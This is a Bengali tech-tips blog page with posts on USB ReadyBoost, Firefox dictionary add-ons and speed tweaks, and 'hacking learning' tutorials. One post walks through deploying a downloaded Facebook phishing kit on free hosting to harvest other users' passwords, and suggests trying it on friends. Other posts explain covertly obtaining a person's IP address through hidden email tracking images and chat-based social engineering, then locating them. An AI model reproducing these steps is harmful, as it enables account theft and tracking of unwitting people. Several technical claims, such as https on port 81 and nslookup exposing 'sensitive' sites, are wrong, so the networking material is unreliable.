Monday, February 25, 2013

USB pendrive বা SD card কে কম্পিউটারের RAM হিসেবে ব্যবহার করুন ।

Windows 7 Users:
১। আপনার USB  ড্রাইভ টি লাগান ।
২। অটো প্লে বক্স থেকে Speed UpMy System অপশনটি সিলেক্ট করুন ।
(যদি অটো প্লে বক্স না ওপেন হয় তাহলে [ My Computer -> RightClick on your Flash Drive -> Properties->Choose ReadyboostTab. ] সিলেক্ট করুন ।)
৩। এবার দুটো অপশন দেখতে পাবেন ।
*. Dedicate this device to Ready boost : This will use entire memory of Flash drive as RAM.
*. Use this Device : Using this youcan Reserve space for storing data in USB and the space left will be used as RAM.
৪। আপনার পছন্দের অপশন সিলেক্ট করে OK দিন ।
আপনার USB  ড্রাইভ টি RAM এ Convert হয়ে গেল ।
UNDO করতে ( goto My Computer -> Right Click on yourFlash Drive -> Properties->Choose ReadyboostTab) & Select ” Do not use this Device ” in the above step and Click OK.

Firefox এর জন্য চরম দুটি Dictionary (Bengali to English ও English to Bengali) Add-ons কাজে লাগবেই

Firefox এর ADD-ONS নিয়ে  ঘাটতে ঘাটতে দুটি চমৎকার  ADD-ONS পেয়ে গেলাম যা আমার কাছে দারুন লেগেছে আসা করছি আপনাদেরও ভাল লাগবে ।
আমরা অনেকে অনেক ধরনের Browser ব্যবহার করি আর এর মধ্যে সবচেয়ে জনপ্রিয় Browser হচ্ছে Mozila Firefox, যাই হোক আজ আমি আপনাদের  জন্য যে দুটি ADD-ONS এনেছি তা Mozila Firefox এ ব্যবহার করা যাবে । ADD-ONS দুটি মূলত (Bengali to English ও English to Bengali) Dictionary, যা খুবি সল্প সময় এর মধ্যে যে কোন Word এর অর্থ দ্রুত খুজে  পারবেন ।
ADD-ONS গুলো ব্যবহার করার জন্য প্রথমে আপনাকে Firefox ব্রাউজার থেকে নিচের দেওয়া লিঙ্কে যেতে হবেঃ
English to Bengali এর জন্যhttps://addons.mozilla.org/en-US/firefox/addon/english-to-bangla-dictionary/?src=ss
Bengali to English এর জন্যhttps://addons.mozilla.org/en-US/firefox/addon/bangla-to-english-dictionary/?src=ss
পেইজ টি আসলে দেখবেন Add to Firefox নামে অপশন আছে তাতে Click করুন ২০০kb এর মতন Download হবে, একটু পর  নতুন একটি Window আসবে তাতে Install অপশন দেখবেন, Install এ Click করুন ব্যাস আপনার কাজ শেষ ।
এখন আপনি কি ভাবে Dictionary টি ব্যবহার করবেন ???
খুবি সহজ, আপনি আপনার Browser থেকে Browse করার সময় web Page এর যে শব্দের অর্থ জানেন না বা বুঝতে পারছেন না  ( সেটি Bengali কিংবা English যেকোনোটি হতে পারে ) সেই শব্দ টি Mouse Pointer দিয়ে  মার্ক করুন এবার Right button এ Click করুন দেখবেন ( get the bangla meaning of selected word এবং get the english meanin of selected word ) নামে দুটি অপশন এসেছে আপনার জেটি প্রয়োজন তাতে Click করলেই  2 থেকে 5 সেকেন্ড এর মধ্যে Word টির অর্থ প্রদর্শিত হবে ।

Saturday, February 2, 2013

নিজের বোকামির কারনে “Facebook hacking” এর কবলে পড়বেন না !! এবং জেনেনিন কিভাবে কারও facebook id password বাহির করতে হয় !!!

একজন হ্যাকার সহজে অন্যের facebook user এর password বাহির করতে পারে facebook phisher sofrware এর মাধ্যমে, আর এজন্যে হ্যাকার কে হতে হবে premium user. আর যদি কেউ freeuser হয়ে থাকেন তবে তার সাইটি ১ঘন্টার মধ্যে usa এর FBI group "cyber crime division" বন্ধ করে দিবে। আমি একজন freeuser হয়ে hacking টা কিভাবে করে সেটা আপনাদের সাথে একটু share করছি :
ডাউনলোড facebook phisher :  http://www.plunder.com/Facebook-Phisher-download-6b7566cfdf.htm
ডাউনলোড করে unzip করুন 
এক হিসেবে আপনিও হ্যাকিং করা জেনে নিলেন >>>>>>>>>>
প্রথমে  http://www.vndv.com/ এই সাইটি যান। সেখান হতে "Zymic" ঢ়ুকুন। তারপর sign up করে member হয়ে লগিন করুন। তারপর Control Panel Home এ যান। সেখান থেকে " create new web host account" যান এবং free web hosting  এ name + password+ tick mark+ confirm reg(উদাহরন আমারটা : http://fbclick.vndv.com/index.html  <আমি freeuser বলে আমারটা close করা হয়েছে>
নিচের ছবিটি খেয়াল করুন<তারেকবিডি হতে নেয়া,premium user দের জন্যে>facebook2[1]
যারা freeuser তাদেরও একই রকম হবে কিন্তু তারা ১ঘন্টার বেশি এই সুবিধাটি পাবেন না।
>> যাই হোক তারপর...................
আপনার নতুন user host password দিয়ে login করুন। তারপর file manager এ যান ,আপনার user host দেখতে পারবেন। তারপর upload file click করুন।আপনি দেখতে পারবেন ৩টি ফাইল।
file 1: browse হতে facebook phisher unzip এর প্রথম file index. upload
file 2:browse হতে facebook phisher unzip এর ২য় file log. upload
file 3:browse হতে facebook phisher unzip এর ৩য় file  login .upload
>>> upload file index হতে permission click হতে সবগুলো box tick দেয়া।
>>> upload file log হতে permission click হতে সবগুলো box tick দেয়া।
>>> upload file login হতে permission click হতে সবগুলো box tick দেয়া। প্রত্যেকবার ok click করুন।
এবার index file টি login করুন যেমন : http://*****.vndv.com/index.html
login করার পর যে homepage আসবে, সেখান হতে যদি কেউ লগিন করে তার password টি সহজে আপনি জেনে যাবেন। password জানার জন্যে আপনাকে আপনার সাইটে log এ refresh/rename দেখতে হবে।
## আপনি অনেক user id বানাতে পারবেন, সুতরাং আপনি নিজেই test করে দেখেন। আর সাবধান হয়ে যান hacking করা থেকে।
### আপনি ইচ্ছা করলে আপনার বন্ধুদের সাথে মজা করতে পারবেন, তাদের বিভিন্ন সাইটে invite করে অথবা আপনার সাইটে invite করে।
*****মনে রাখবেন এটা শুধু আপনাকে হ্যাকিং করা হতে help করবে এবং নিরাপদ রাখবে*******

হ্যাকিং লার্নিং :: আইপি এড্রেস অনুসন্ধান করা এবং চ্যাটিংকৃত ব্যাক্তির অবস্থান জানা

ইমেইল দাতার আইপি অনুসন্ধান :

আপনার মেইলবক্স খুলুন। তার থেকে যেকোন একটি ইমেইল খুলুন। Reply-তে ক্লিক করুন। এবার Show original এ ক্লিক করুন। এখন যে তথ্যগুলো আসবে সেগুলো খুব ভালোভাবে খেয়াল করুন। সেখানেই আপনি হয়ত ইমেইল দাতার আইপি দেখতে পাবেন। কিন্তু gmail থেকে যদি কেউ আপনাকে মেইল করে তাহলে এই পদ্ধতি অনুসারে আপনি আইপি খুজে পাবেন না। এখন উপায়? হ্যা হ্যা অস্থির হবেন না। এক্ষুনি তা বলছি।
আসলে মূল ব্যাপারটি হচ্ছে gmail সবসময় https ব্যবহার করে। আমরা সাধারনত ওয়েবসাইটের এড্রেসে দেখতে পাই http যার সম্পূর্ণ রূপ হচ্ছে Hyper Text Transfer Protocol. আর https হচ্ছে এই http এর secured রূপ। আশা করি বুঝতে পেরেছেন। যার কারনেই জিমেইলে আপনি আইপি খুজে পাবেন না। এখন যেই পদ্ধতিটির কথা আপনাদের বলব সেটি হচ্ছে প্রায় সব ধরনের ইমেইল এড্রেস (ইয়াহুমেইল, জিমেইল, এমএসএন ইত্যাদি) থেকে আইপি বের করার পদ্ধতি।
প্রথমেই http://readnotify.com সাইটটি খুলুন।
এরপর এখানে রেজিষ্ট্রেশন করুন।
এখন আপনি যার ইমেইল এড্রেস অনুসন্ধান করতে চান তার বরারব একটি মেইল লিখুন। এবার ইমেইল টু সেকশন এরিয়ায় লিখুন victim’semailid.rednotify.com
পাঠিয়ে দিন। যখন সে ইমেইলটি পড়বে তখন স্বয়ংক্রিয়ভাবে আপনার রিডনোটিফাই একাউন্টে তার আইপি চলে আসবে। আসলে রিডনোটিফাই একটি স্বয়ংক্রিয় লুকানো ছবি আপনার ইমেইলের সাথে ঐ ব্যাক্তি বরাবর পাঠিয়ে দেয়। যার ফলে আপনি তার আইপি পেয়ে যান। পদ্ধতিটি খুব কাজের।

অবস্থান অনুসন্ধান :

আমরা তো আইপি পেলাম এবার দেখব কিভাবে ঐ ব্যাক্তির অবস্থান সম্পর্কে জানা যায়। অর্থাৎ ব্যাক্তিটি কোন দেশের কোন শহরে আছে তা জানা।
প্রথমেই http://www.ip2location.com সাইটটি খুলুন।
এই সাইটটির খালি ঘরে আপনার কাঙ্খিত আইপি এড্রেসটি বসিয়ে দিন আর মজা দেখুন।
আপনি যার সাথে চ্যাটিং করছেন তার অবস্থান জানা :
আপনি যার সাথে চ্যাটিং করছেন তাকে তার আইপি সম্বন্ধে জিগ্যেস করুন। সে বললে তো বলতে হবে আপনার ভাগ্য সুপ্রসন্ন। আর না বললে কি করবেন? একটু অপেক্ষা করুন বলছি।
এখানে একটি ব্যাপার উল্লেখ করার মত আর তা হচ্ছে আগে আমরা একটি কমান্ডের সাথে পরিচিত হয়েছিলাম। netstat -n এর কথা মনে আছে? হ্যা এই কমান্ডটি খুবই গুরুত্বপূর্ণ। আপনি ইন্টারনেটে যতগুলো কানেকশনের সাথে যুক্ত আছেন ঠিক ততগুলোর তথ্যই এই কমান্ডটির মাধ্যমে পাওয়া যাবে। আরেকটু ভেঙ্গে বলছি। ধরুন, মনে করুন আপনি ফেসবুকে,জিমেইলে এবং টেকটিউনসে একই সঙ্গে প্রবেশ করে আছেন। উপরের কমান্ডটি এই তিনটি সার্ভার সম্পর্কেই আপনার কাছে তথ্য সাপ্লাই করবে। বর্তমানে ইন্টারনেটে এক এক ব্যাক্তি চ্যাটিং এর এক এক পন্থা ব্যবহার করে। যেমন : ICQ Messenger, MSN Messenger, Yahoo Messenger, Gtalk, Meebo, Gigsby, AIM ইত্যাদি। তাহলে বুঝুন কতটুকু ঝামেলার কাজ করতে যাচ্ছেন আপনি? আর এ কারনেই নিচে ধাপে ধাপে কয়েকটি ক্ষেত্র দেয়া হল। লক্ষ করুন।

ক্ষেত্র-১

যদি আপনি ICQ Messenger এ চ্যাট করেন আর সেখানের কারও অবস্থান জানতে চান তাহলে এ পদ্ধতিটি কাজে লাগান। ICQ Messenger এর কাজ করার ধরন হচ্ছে (আপনি->আপনার বন্ধু->আপনি) এইভাবে। তাই কারও আইপি সংগ্রহ করা এক্ষেত্রে খুব সহজ কাজ। মনে করুন আপনি কারও আইপি জানতে চাচ্ছেন তাহলে তাকে হিট করুন কিন্তু চ্যাটিং শুরু করবেন না। এবার Start->Run->cmd->netstat -n
এন্টার দিন। যে আইপিগুলো আসবে তা কোন রাফ কাগজে লিখে রাখুন। এবার আপনি তার সাথে চ্যাটিং আরম্ভ করুন। আবার Start->Run->cmd->netstat -n
এন্টার দিন। এবার আপনি সেখানে নতুন একটি আইপি দেখতে পাবেন। আর এই ব্যাক্তির সাথেই আপনি এখন চ্যাটিং এ ব্যাস্ত। এবার কিভাবে তার অবস্থান বের করবেন তা নিশ্চয়ই আর বলে দিতে হবে না।
"learn to hack ip" "www.mahedi.info"

ক্ষেত্র-২

.::: Yahoo Messenger, MSN Messenger, GTalk Messenger এর ক্ষেত্রে :::.
উপরোক্ত মেসেন্জারগুলোর কাজ করার ধরন হচ্ছে (আপনি-মেসেন্জারের সার্ভার-আপনার বন্ধু) এইভাবে। এখানে যদি আপনি ক্ষেত্র-১ এর পদ্ধতি কাজে লাগান তাহলে আপনি মেসেন্জারের আইপি পাবেন, ব্যাক্তির না। এইক্ষেত্রে আপনি চালাতে পারেন সোস্যাল ইন্জিনিয়ারিং। যদিও এটা নিয়ে পরবর্তী অধ্যায়ে আলোচনা হবে তথাপি এখানে কিছু পরিচিতি দেয়া হচ্ছে। সোস্যাল ইন্জিনিয়ারিং হচ্ছে কাউকে বোকা বানিয়ে তাকে হ্যাকিং করা। আর এই মেসেন্জারের ক্ষেত্রে (মনে রাখবেন অধিকাংশ মেসেন্জারই এই কাজটি করে থাকে) আপনি আপনার সাথে চ্যাটিংকৃত ব্যাক্তিটিকে বলুন আপনার কাছে কোন ফাইল পাঠাতে বা তাকে আপনি কিছু পাঠাতে পারেন, সেটা হতে পারে কোন ছবি বা আপনার ছবি। যদি সে রাজি হয় তাহলে ক্ষেত্র-১ এর পদ্ধতি চালিয়ে যান। যখন আপনি তার সাথে চ্যাটিং করবেন তখন আপনি অতিরিক্ত যে আইপি এড্রেসটি দেখতে পাবেন সেটি হচ্ছে মেসেন্জারের আইপি আর যখন সে আপনার কাছে কোন কিছু পাঠাবে তখন আরেকটি নতুন আইপি দেখতে পাবেন, সেটি হচ্ছে তার আইপি। এছাড়াও আরও একটি উপায় আছে তা হল, আপনি তাকে আপনার কাছে একটি মেইল পাঠাতে বলতে পারেন। যখনই সে মেইল পাঠাবে আপনি রিডনোটিফাই পদ্ধতি চালিয়ে যান যা আগে বলা হয়েছে। কোন প্রশ্ন?

ক্ষেত্র-৩

.::: Meebo, Gigsby, Trillion ইত্যাদি মাল্টি চ্যাটিং ইন্জিনের ক্ষেত্রে :::.
এক্ষেত্রে কোন পদ্ধতি নেই। শুধু এতটুকুই করা যায় তা হল আপনি বলতে পারেন আপনাকে মেইল করতে আর আপনি রিডনোটিফাই পদ্ধতি চালাতে পারেন। আসলে কারও আইপি পাওয়া তেমন কঠিন কাজ নয় আর এটা তেমন বড় ধরনের কাজও নয়। আইপি এড্রেসের ব্যাপারে বলতে গেলে অনেক কথা বলতে হয়। আইপি এড্রেস রয়েছে বিভিন্ন ধরনের। আবার সেখানে সাবনেট আইডি এবং হোস্ট আইডি নামক ব্যাপার রয়েছে। এছাড়াও আপনি একটি ওয়েবসাইট শুধু আইপি এড্রেস লিখেই প্রবেশ করতে পারেন যদিও সেখানে হেক্সা ট্রান্সফার এবং কোস্ট্রা ট্রান্সফার নামক ব্যাপার থেকেই যায়। কিন্তু বিশ্বাস করুন এতকিছু এখন আর আপনার করা লাগবে না। আপনি শুধুমাত্র একটি কমান্ডের সাহায্যেই আপনার আইপির নারিনক্ষত্র বের করতে পারবেন। পদ্ধতিটি অনুসরন করুন।
Start->Run->cmd->ipconfig/all
এন্টার চাপুন। সকল তথ্য এখন আপনার সামনে চলে আসবে। এছাড়াও inconfig/series কমান্ডটিও ব্যবহার করা যায় তবে netstat -n এটিই প্রসিদ্ধ।

হ্যাকিং লার্নিং :: আইপি(IP) এড্রেস কি? এর বিতর্কিত ব্যবহার

আইপি এড্রেস কি?

আইপি এড্রেস(IP Address) এর সম্পূর্ন ইংরেজী রূপ হচ্ছে Internet Protocol Address. ভার্চুয়াল জগৎ থেকে আপনি যে তথ্য নিচ্ছেন তার উপর ভিত্তি করে আইপি এড্রেস হচ্ছে একটি অদ্বিতীয় এড্রেস। অর্থাৎ আপনি যে আইপি এড্রেসটির মালিক তা আর কারও কাছে নেই। আপনার ইন্টারনেট সেবাদানকারী প্রতিষ্ঠান এই আইপি এড্রেস এর মাধ্যমেই অবগত থাকেন, তিনি আপনার কাছে যে তথ্য পাঠাচ্ছেন এবং আপনি তা যথাযথভাবে পাচ্ছেন।

আপনার নিজের আইপি এড্রেস দেখা :

  • প্রথমে Start->Run->খালি ঘরে লিখুন cmd
  • এবার কী-বোর্ড থেকে এন্টার চাপুন।
  • একটি কমান্ড এরিয়া দেখতে পাবেন। সেখানে লিখুন netstat -n
  • এন্টার চাপুন। একটি লিস্ট আপনার সামনে আসবে। লোকাল এড্রেসের দিকে খেয়াল করুন। যেটি প্রথমে আসবে সেটিই আপনার আইপি এড্রেস।
দ্বিতীয় নিয়ম : আপনার ব্রাউজারের এড্রেস বারে লিখুন http://www.whatismyip.com
একটি ওয়েবসাইট খুলবে। সেখানেই বড় অক্ষরে আপনি আপনার বর্তমান আইপি দেখতে পাবেন। নিচের লিস্টটি মনে রাখুন। পরবর্তীতে কাজে লাগবে।
ftp—->21
smtp—>25
dns—->53
http—>80
https—->81
pop3—->110
telnet—>23
নাম্বারগুলো হচ্ছে পোর্ট নাম্বার। এ সম্পর্কে পরে কোন এক সময় আলোচনা করা হবে।

কোন ওয়েবসাইটের আইপি বের করার নিয়ম :

যদি আপনি কোন ওয়েবসাইট বা কোন ব্যক্তির একাউন্ট বা তার পিসি হ্যাক করবেন তাহলে সবর্প্রথম যে কাজটি করতে হবে তা হচ্ছে তার আইপি এড্রেস সংগ্রহ করা। যতক্ষন পযর্ন্ত না আপনি তার আইপি এড্রেস বের করতে পারছেন ততক্ষন পযর্ন্ত আপনি তার কি ই বা করতে পারবেন? এখন আপনাদের দেখাচ্ছি যেভাবে কোন ওয়েবসাইটের আইপি এড্রেস বের করবেন।
  • প্রথমে Start->Run->খালি ঘরে লিখুন cmd
  • এবার কী-বোর্ড থেকে এন্টার চাপুন।
  • একটি কমান্ড এরিয়া দেখতে পাবেন। সেখানে লিখুন tracert websitename
  • এন্টার চাপুন। এখন কিছু তথ্য স্বয়ংক্রিয়ভাবে আপনার সামনে আসবে।
আপনি সেখানে নীল রংয়ের কিছু লেখা দেখতে পাবেন। আপনি সেখানেই আপনার কাঙ্খিত আইপি এড্রেসিট দেখতে পাবেন। নীল লেখাগুলোর প্রথম লাইনেই আপনি আইপিটি দেখতে পাবেন। দ্বিতীয় লাইন সহ এভাবে সবোর্চ্চ ৩০টি হুপ দেখতে পাবেন।

হুপের ব্যাখ্যা :

যখন আপনি কোন ওয়েবসাইটে প্রবেশের চেষ্ঠা করেন তখন আপনি স্বয়ংক্রিয়ভাবে কিছু তথ্য সেই ওয়েবসাইটের কাছে প্রেরন করেন যার প্রতিউত্তরে সেই ওয়েবসাইটটিও আপনার কাছে কিছু তথ্য প্রেরন করে (যার ফলাফল স্বরূপ আপনি ওয়েবসাইটটিকে দেখতে পান)।এই প্রক্রিয়াটি চলতেই থাকে। মনে করুন আপনি কমান্ড এরিয়ায় লিখলেন tracert yahoo.com
তখন আপনার এই তথ্যের প্যাকেজটি গুগলের সার্ভারে (যেখানে তথ্য জমা থাকে) যাবে।গুগলও আপনাকে এর প্রতিউত্তর পাঠাবে। যেহেতু গুগল একটি বড় সাইট সেহেতু এর অনেকগুলো সার্ভার রয়েছে। সুতরাং প্রতিউত্তরগুলো সেসকল সার্ভার থেকেই আসে। এবার আপনি আপনার কমান্ড এরিয়ায় লক্ষ করুন সেখানে সবোর্চ্চ ৩০টির মত আইপি হুপ রয়েছে। এতগুলো আসার মানে হচ্ছে, গুগল তার যতগুলো সার্ভার থেকে আপনার কাছে তথ্য প্রেরন করছে সেই সার্ভারগুলোর আইপি হুপই আপনি দেখতে পাচ্ছেন।
কমান্ড এরিয়ায় আপনি * ধরনের কিছু চিন্হ দেখতে পাবেন। এর মানে হচ্ছে এই যে সে স্থানগুলোতে ফায়ারওয়াল স্থাপন করা রয়েছে যাতে করে যে কেউ সহজে আক্রমন করতে না পারে।

সাধারন ভূল-ধারনা :

"google hack" "www.mahedi.info"
অনেকেই আছেন যারা মনে করেন যে ইন্টারনেট থেকে কোন উচ্চক্ষমতা সম্পন্ন স্পশর্কাতর তথ্য বা তথ্যাদি দেখা বা জানা যায় না। আসলে এটি ভূল ধারনা। মনে করুন ইন্টারনেটে অনেকেই হটফাইল বা রেপিডশেয়ারের প্রিমিয়াম একাউন্ট দেয়, যা থেকে আপনি উপকৃত হন। কিন্তু সমস্যা হচ্ছে আপনি জানেন না এই একাউন্ট কোথা থেকে দেয়া হয়েছে? আপনি ইচ্ছে করলেই এসব তথ্য জানতে পারেন।
যখন আপনি কমান্ড এরিয়ায় কোন ওয়েবসাইটের বিপরীতে nslookup লিখে এন্টার দিবেন তখন হয়ত এরকম লেখাও আসতে পারে যে You are now authentized to this route.
এ রকম কিছু লেখা দেখলেই আপনি বুঝে নেবেন যে, ওই ওয়েবসাইটে স্পশর্কাতর তথ্য রয়েছে। ওই ওয়েবসাইট সম্পর্কে বিস্তারিত জানতে আপনি নিচের ওয়েবসাইটগুলো ব্যবহার করতে পারেন।

ঐ সকল ওয়েবসাইটে শুধুমাত্র ওয়েবসাইটটির নাম দিয়েই আপনি এর আইপি, স্থান, মালিকের নাম, কবে কেনা হয়েছে, মেয়াদ কত দিনের, দৈনিক ভিজিটর সংখ্যা, নেম সার্ভার ইত্যাদি বিভিন্ন তথ্য জানতে পারবেন। তথ্য জোগাড় করা একজন হ্যাকারের প্রাথমিক কাজ। এটি না করলে আপনি কিছুই করতে পারবেন না। আশা করছি আপনারা কোন ওয়েবসাইটের ব্যাপারে প্রাথমিক তদন্তের কাজটি যথাযথভাবে করতে পারবেন। এতক্ষন আপনারা যা শিখলেন তা হচ্ছে শুধুমাত্র ওয়েবসাইট কেন্দ্রিক। পরবর্তী অধ্যায়ে আপনাদেরকে জানাব কিভাবে কোন ব্যাক্তিকে ট্রেস করবেন। সে পযর্ন্ত ভালো থাকুন।

বাড়িয়ে নিন আপনার Mozilla Firefox এর গতি!!

নিচের Step গুলি অনুসরন করুন:
১) প্রথমে আপনার Browser এর Address Bar এ  “about:config” লিখে Enter চাপুন।
২) তারপর কোন Notification পেলে Ok ক্লিক করুন।
৩)  উপরের Search Box এ “network.http” লিখুন এবং Enter চাপুন।
৪) “‘network.http.pipelining” এবং ”network.http.proxy.pipelining” এই দুটি Option এ Double Click করুন।
৫) “network.http.pipelining.maxrequests” Right Click করে Value টাকে “30” তে Modify করুন।
৬) খালি জায়গায় Right Click করে “New” Select করুন তারপর “integer” Select করুন।
৭)  তারপর “nglayout.initialpaint.delay”এই Name টি লিখুন এবং OK Press করুন তারপর Type করুন “0”
ব্যাস!! কাজ শেষ!! আবার দেখুন আপনার Firefox কত Fast হয়ে গেছে!!
মনে রাখবেন আপনার Firefox Browser অবশ্যই নতুন ভার্সন এর হতে হবে ।